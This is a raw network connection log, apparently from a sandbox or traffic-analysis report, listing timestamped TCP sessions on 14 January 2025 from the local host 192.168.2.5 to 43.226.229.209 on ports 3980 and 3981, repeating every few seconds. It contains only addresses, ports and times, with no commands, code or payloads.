Jan 14, 2025 15:42:34.389746904 CET	49983	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:34.391043901 CET	49983	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:34.396899939 CET	3980	49983	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:35.699109077 CET	3980	49983	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:35.699332952 CET	49983	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:35.699481010 CET	49983	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:35.701394081 CET	49984	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:35.704293966 CET	3980	49983	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:35.706248045 CET	3981	49984	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:35.706338882 CET	49984	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:35.710401058 CET	49984	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:35.715203047 CET	3981	49984	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:37.051342964 CET	3981	49984	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:37.051457882 CET	49984	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:37.052323103 CET	49984	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:37.057080030 CET	3981	49984	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:38.090418100 CET	49985	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:38.095717907 CET	3980	49985	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:38.095784903 CET	49985	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:38.109273911 CET	49985	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:38.114388943 CET	3980	49985	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:39.474324942 CET	3980	49985	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:39.474414110 CET	49985	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:39.474901915 CET	49985	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:39.476845980 CET	49986	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:39.481862068 CET	3980	49985	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:39.483553886 CET	3981	49986	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:39.483619928 CET	49986	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:39.488027096 CET	49986	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:39.494972944 CET	3981	49986	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:40.810360909 CET	3981	49986	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:40.810432911 CET	49986	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:40.812496901 CET	49986	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:40.817228079 CET	3981	49986	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:41.835920095 CET	49987	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:41.840841055 CET	3980	49987	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:41.840950966 CET	49987	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:41.841612101 CET	49987	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:41.846381903 CET	3980	49987	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:43.192101002 CET	3980	49987	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:43.192171097 CET	49987	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:43.192430973 CET	49987	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:43.195471048 CET	49988	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:43.197392941 CET	3980	49987	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:43.200280905 CET	3981	49988	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:43.200354099 CET	49988	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:43.206722021 CET	49988	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:43.211590052 CET	3981	49988	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:44.539886951 CET	3981	49988	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:44.541062117 CET	49988	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:44.541831017 CET	49988	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:44.546636105 CET	3981	49988	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:45.570054054 CET	49989	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:45.574894905 CET	3980	49989	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:45.574985027 CET	49989	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:45.576042891 CET	49989	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:45.580807924 CET	3980	49989	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:46.899655104 CET	3980	49989	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:46.899835110 CET	49989	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:46.900016069 CET	49989	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:46.901981115 CET	49990	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:46.905194044 CET	3980	49989	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:46.906907082 CET	3981	49990	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:46.907008886 CET	49990	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:46.911031008 CET	49990	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:46.915848970 CET	3981	49990	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:48.217861891 CET	3981	49990	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:48.217967987 CET	49990	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:48.218667984 CET	49990	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:48.223494053 CET	3981	49990	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:49.226320028 CET	49991	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:49.232856989 CET	3980	49991	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:49.232971907 CET	49991	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:49.233655930 CET	49991	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:49.240288973 CET	3980	49991	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:50.557105064 CET	3980	49991	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:50.557219028 CET	49991	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:50.557491064 CET	49991	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:50.559432030 CET	49992	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:50.563429117 CET	3980	49991	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:50.567003965 CET	3981	49992	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:50.567084074 CET	49992	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:50.571773052 CET	49992	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:50.576728106 CET	3981	49992	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:51.900921106 CET	3981	49992	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:51.901137114 CET	49992	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:51.901812077 CET	49992	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:51.907500982 CET	3981	49992	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:52.929172993 CET	49993	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:52.934051991 CET	3980	49993	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:52.934150934 CET	49993	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:52.935342073 CET	49993	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:52.940231085 CET	3980	49993	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:54.258577108 CET	3980	49993	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:54.259201050 CET	49993	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:54.259329081 CET	49993	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:54.264039040 CET	3980	49993	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:54.267097950 CET	49994	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:54.271903038 CET	3981	49994	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:54.273000956 CET	49994	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:54.277599096 CET	49994	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:54.282386065 CET	3981	49994	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:55.611938953 CET	3981	49994	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:55.612992048 CET	49994	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:55.613692045 CET	49994	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:55.618499994 CET	3981	49994	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:56.617732048 CET	49995	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:56.622636080 CET	3980	49995	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:56.622750998 CET	49995	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:56.623910904 CET	49995	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:56.628731966 CET	3980	49995	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:57.932096004 CET	3980	49995	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:57.932255983 CET	49995	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:57.932532072 CET	49995	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:57.934591055 CET	49996	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:57.937772989 CET	3980	49995	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:57.940073013 CET	3981	49996	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:57.940191031 CET	49996	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:57.945766926 CET	49996	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:57.950535059 CET	3981	49996	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:59.283044100 CET	3981	49996	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:59.283210039 CET	49996	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:59.283719063 CET	49996	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:59.288501024 CET	3981	49996	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:00.304554939 CET	49997	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:00.309307098 CET	3980	49997	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:00.309514999 CET	49997	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:00.310270071 CET	49997	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:00.315051079 CET	3980	49997	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:01.627123117 CET	3980	49997	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:01.627335072 CET	49997	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:01.666549921 CET	49997	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:01.668227911 CET	49998	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:01.671535015 CET	3980	49997	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:01.673103094 CET	3981	49998	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:01.673191071 CET	49998	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:01.677570105 CET	49998	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:01.682363033 CET	3981	49998	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:02.985534906 CET	3981	49998	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:02.985661983 CET	49998	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:02.986402988 CET	49998	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:02.992201090 CET	3981	49998	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:03.991806984 CET	49999	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:03.996649981 CET	3980	49999	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:03.996738911 CET	49999	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:03.997903109 CET	49999	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:04.002681971 CET	3980	49999	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:05.332341909 CET	3980	49999	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:05.332432985 CET	49999	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:05.332750082 CET	49999	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:05.334548950 CET	50000	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:05.337511063 CET	3980	49999	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:05.339401960 CET	3981	50000	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:05.339474916 CET	50000	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:05.344189882 CET	50000	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:05.349040985 CET	3981	50000	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:06.666683912 CET	3981	50000	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:06.666825056 CET	50000	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:06.667557955 CET	50000	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:06.672338963 CET	3981	50000	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:07.695467949 CET	50001	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:07.700481892 CET	3980	50001	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:07.700603008 CET	50001	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:07.701426029 CET	50001	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:07.706244946 CET	3980	50001	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:09.006979942 CET	3980	50001	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:09.007225037 CET	50001	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:09.007481098 CET	50001	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:09.009344101 CET	50002	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:09.012264967 CET	3980	50001	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:09.014138937 CET	3981	50002	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:09.014239073 CET	50002	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:09.018412113 CET	50002	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:09.023303032 CET	3981	50002	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:10.354479074 CET	3981	50002	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:10.354615927 CET	50002	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:10.355308056 CET	50002	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:10.361474991 CET	3981	50002	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:11.367021084 CET	50003	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:11.371812105 CET	3980	50003	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:11.371932030 CET	50003	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:11.372776031 CET	50003	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:11.377579927 CET	3980	50003	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:12.684469938 CET	3980	50003	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:12.684544086 CET	50003	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:12.684844017 CET	50003	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:12.686686993 CET	50004	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:12.689621925 CET	3980	50003	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:12.691565990 CET	3981	50004	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:12.691652060 CET	50004	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:12.696033955 CET	50004	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:12.700862885 CET	3981	50004	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:13.999974966 CET	3981	50004	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:14.000221968 CET	50004	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:14.000825882 CET	50004	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:14.005697012 CET	3981	50004	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:15.023053885 CET	50005	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:15.027961969 CET	3980	50005	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:15.028069973 CET	50005	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:15.029105902 CET	50005	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:15.033946037 CET	3980	50005	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:16.352806091 CET	3980	50005	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:16.352957010 CET	50005	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:16.353246927 CET	50005	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:16.355189085 CET	50006	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:16.357964039 CET	3980	50005	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:16.359987020 CET	3981	50006	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:16.360081911 CET	50006	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:16.364188910 CET	50006	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:16.368968010 CET	3981	50006	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:17.679721117 CET	3981	50006	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:17.680002928 CET	50006	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:17.680721998 CET	50006	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:17.685548067 CET	3981	50006	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:18.775751114 CET	50007	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:18.780698061 CET	3980	50007	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:18.780781031 CET	50007	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:18.782844067 CET	50007	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:18.787667990 CET	3980	50007	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:20.098726988 CET	3980	50007	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:20.099387884 CET	50007	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:20.099767923 CET	50007	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:20.104604006 CET	3980	50007	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:20.104914904 CET	50008	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:20.109774113 CET	3981	50008	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:20.111001015 CET	50008	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:20.115417004 CET	50008	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:20.120187998 CET	3981	50008	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:21.414170027 CET	3981	50008	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:21.414273024 CET	50008	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:21.414922953 CET	50008	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:21.419740915 CET	3981	50008	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:22.429641008 CET	50009	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:22.434761047 CET	3980	50009	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:22.434879065 CET	50009	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:22.435609102 CET	50009	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:22.440402031 CET	3980	50009	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:23.768166065 CET	3980	50009	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:23.769074917 CET	50009	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:23.769304037 CET	50009	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:23.771176100 CET	50010	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:23.774112940 CET	3980	50009	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:23.776089907 CET	3981	50010	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:23.776218891 CET	50010	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:23.780833006 CET	50010	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:23.785680056 CET	3981	50010	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:25.106851101 CET	3981	50010	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:25.106961966 CET	50010	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:25.107641935 CET	50010	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:25.112401009 CET	3981	50010	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:26.116760969 CET	50011	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:26.121637106 CET	3980	50011	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:26.121841908 CET	50011	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:26.122510910 CET	50011	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:26.127288103 CET	3980	50011	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:27.439759016 CET	3980	50011	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:27.439891100 CET	50011	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:27.440143108 CET	50011	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:27.444914103 CET	3980	50011	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:27.451666117 CET	50012	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:27.456698895 CET	3981	50012	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:27.456792116 CET	50012	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:27.462626934 CET	50012	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:27.467425108 CET	3981	50012	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:28.780575991 CET	3981	50012	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:28.780668974 CET	50012	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:28.781094074 CET	50012	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:28.785901070 CET	3981	50012	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:29.804517031 CET	50013	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:29.809475899 CET	3980	50013	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:29.809571028 CET	50013	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:29.810398102 CET	50013	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:29.815210104 CET	3980	50013	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:31.147000074 CET	3980	50013	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:31.147063017 CET	50013	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:31.147321939 CET	50013	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:31.149213076 CET	50014	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:31.152093887 CET	3980	50013	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:31.153994083 CET	3981	50014	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:31.154090881 CET	50014	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:31.158786058 CET	50014	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:31.163628101 CET	3981	50014	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:32.465306044 CET	3981	50014	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:32.465387106 CET	50014	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:32.465826035 CET	50014	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:32.470588923 CET	3981	50014	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:33.476303101 CET	50015	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:33.481180906 CET	3980	50015	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:33.481493950 CET	50015	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:33.482594967 CET	50015	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:33.487416983 CET	3980	50015	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:34.858666897 CET	3980	50015	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:34.861263990 CET	50015	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:34.861444950 CET	50015	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:34.866239071 CET	3980	50015	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:34.866956949 CET	50016	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:34.874469995 CET	3981	50016	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:34.877389908 CET	50016	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:34.881714106 CET	50016	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:34.886518955 CET	3981	50016	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:36.187582016 CET	3981	50016	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:36.189029932 CET	50016	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:36.189455032 CET	50016	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:36.195831060 CET	3981	50016	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:37.210768938 CET	50017	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:37.215647936 CET	3980	50017	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:37.217796087 CET	50017	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:37.218327999 CET	50017	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:37.223104954 CET	3980	50017	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:38.549385071 CET	3980	50017	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:38.549453974 CET	50017	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:38.549761057 CET	50017	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:38.551879883 CET	50018	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:38.554550886 CET	3980	50017	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:38.556727886 CET	3981	50018	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:38.557075977 CET	50018	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:38.562412024 CET	50018	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:38.567262888 CET	3981	50018	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:39.882406950 CET	3981	50018	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:39.883019924 CET	50018	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:39.883415937 CET	50018	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:39.888175964 CET	3981	50018	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:40.898725033 CET	50019	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:40.903595924 CET	3980	50019	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:40.903683901 CET	50019	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:40.904556036 CET	50019	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:40.909310102 CET	3980	50019	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:42.213988066 CET	3980	50019	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:42.214071989 CET	50019	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:42.214211941 CET	50019	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:42.216460943 CET	50020	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:42.219072104 CET	3980	50019	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:42.221251011 CET	3981	50020	43.226.229.209	192.168.2.5
